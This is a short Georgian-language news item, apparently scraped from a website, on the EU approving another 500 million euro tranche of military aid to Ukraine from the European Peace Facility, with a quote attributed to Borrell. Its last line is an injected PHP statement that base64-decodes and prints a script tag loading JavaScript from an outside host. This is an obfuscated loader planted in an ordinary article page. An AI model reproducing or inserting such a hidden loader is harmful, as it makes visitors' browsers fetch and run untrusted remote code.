celsiusi
ავერსი საქკაბელი

ევროკავშირმა უკრაინის სამხედრო დახმარებისთვის 500 მილიონი ევროს ოდენობის მორიგი ტრანშის გამოყოფას მხარი დაუჭირა. შესაბამისი გადაწყვეტილება ბრიუსელში ევროკავშირის საგარეო საქმეთა მინისტრებმა მიიღეს. თანხა გამოიყოფა ევროპის მშვიდობის ფონდიდან, რომელიც წარმოადგენს ევროკავშირის საერთო ფონდს უკრაინის დახმარების დასაფინანსებლად.

ამგვარად, აღნიშნული ფონდიდან უკრაინის დასახმარებლად გამოყოფილი თანხა ჯამში 3,6 მილიარდ ევროს შეადგენს.
„ჩვენ გავაგრძელებთ უკრაინის მხარდაჭერას. უკრაინამ უნდა მოიგოს ეს ომი და ჩვენ მხარს დავუჭერთ მას ყველა შესაძლო გზით“, – განაცხადა საგარეო პოლიტიკისა და უსაფრთხოების საკითხებში ევროკავშირის უმაღლესმა წარმომადგენელმა შემაჯამებელ პრესკონფერენციაზე.
ჯოზეფ ბორელის თქმით, დამატებით 45 მილიონი ევროს გამოყოფა მოხდება უკრაინელი სამხედროების წვრთნისთვის ევროკავშირის საწვრთნელი მისიის ფარგლებში.
416
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");